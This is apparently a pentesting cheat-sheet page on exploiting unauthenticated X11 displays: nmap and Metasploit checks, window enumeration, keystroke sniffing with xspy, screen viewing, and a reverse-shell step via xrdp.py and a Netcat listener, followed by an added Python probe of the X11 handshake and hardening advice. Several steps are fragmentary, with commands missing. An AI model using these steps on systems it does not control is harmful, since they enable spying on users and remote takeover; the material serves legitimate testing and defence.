The X Window System (aka X) is a windowing system for bitmap displays that is common on UNIX-based operating systems. X provides the basic framework for a GUI-based environment. X does not mandate the user interface; individual programs handle this.
From: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
Default port: 6000
```
PORT     STATE SERVICE
6000/tcp open  X11
```
Check for anonymous connection:
```
nmap -sV --script x11-access -p <PORT> <IP>
msf > use auxiliary/scanner/x11/open_x11
```
Verify Connection
```
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> # Ex: xwininfo -root -tree -display 10.5.5.12:0
```
xspy to sniff the keyboard keystrokes.
Sample Output:
Screenshots capturing
Remote Desktop View
Way from: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
Way from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
First we need to find the ID of the window using xwininfo
XWatchwin
For live viewing we need to use
Other way:
Reverse Shell: Xrdp also allows taking a reverse shell via Netcat. Type in the following command:
```
./xrdp.py <IP:0> --no-disp
```
It will prompt a new control pane where we can see the R-shell option, which is illustrated below:
We will start the Netcat listening mode in our local system on port 5555, which is illustrated below:
Then add the IP and port and then select R-Shell, which is illustrated below:
Now as can be seen below we have complete system access:
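What the "Check for anonymous connection" step tests at the protocol level, as an added example (not code from the original page, nmap or Metasploit): the client sends an X11 connection setup request with empty authorization fields, and the first byte of the reply says whether the server refused it, asked for authentication, or accepted it. The function names and the sample replies are constructed for illustration, and the sketch assumes a little-endian client.

```python
import socket
import struct

def build_setup_request() -> bytes:
    # Byte order 'l' (little-endian), protocol 11.0, zero-length auth name and data.
    return struct.pack("<BxHHHHxx", 0x6C, 11, 0, 0, 0)

def classify_setup_reply(reply: bytes) -> dict:
    """Interpret the start of an X server's connection setup reply."""
    if len(reply) < 8:
        return {"status": "truncated"}
    code = reply[0]
    if code == 0:  # Failed: byte 1 holds the reason length, text follows the header
        return {"status": "refused", "reason": reply[8:8 + reply[1]].decode("latin-1")}
    if code == 2:  # Authenticate: the server wants further authentication
        n = struct.unpack_from("<H", reply, 6)[0] * 4
        return {"status": "auth_required",
                "reason": reply[8:8 + n].rstrip(b"\0").decode("latin-1")}
    if code == 1:  # Success: accepted although the client sent no credentials
        vendor = ""
        if len(reply) >= 40:
            vlen = struct.unpack_from("<H", reply, 24)[0]
            vendor = reply[40:40 + vlen].decode("latin-1")
        return {"status": "open", "vendor": vendor}
    return {"status": "unknown"}

def probe(host: str, display: int = 0, timeout: float = 3.0) -> dict:
    """Send the empty-auth request to TCP 6000+display of a host you administer."""
    with socket.create_connection((host, 6000 + display), timeout=timeout) as s:
        s.sendall(build_setup_request())
        return classify_setup_reply(s.recv(4096))

# Constructed sample replies (built by hand, not captured from a real server).
_REASON = b"No protocol specified"
SAMPLE_REFUSED = struct.pack("<BBHHH", 0, len(_REASON), 11, 0, 6) + _REASON.ljust(24, b"\0")
_VENDOR = b"Example X Server"
SAMPLE_OPEN = (struct.pack("<BxHHH", 1, 11, 0, 12)
               + struct.pack("<IIIIHHBBBBBBBB4x", 1, 0x400000, 0x1FFFFF, 256,
                             len(_VENDOR), 0xFFFF, 0, 0, 0, 0, 32, 32, 8, 255)
               + _VENDOR)

if __name__ == "__main__":
    for name, raw in (("refused", SAMPLE_REFUSED), ("open", SAMPLE_OPEN)):
        print(name, classify_setup_reply(raw))
```

A display that classifies as `open` should be restricted with xauth cookies instead of `xhost +`, or have its TCP listener disabled with the X server's `-nolisten tcp` option.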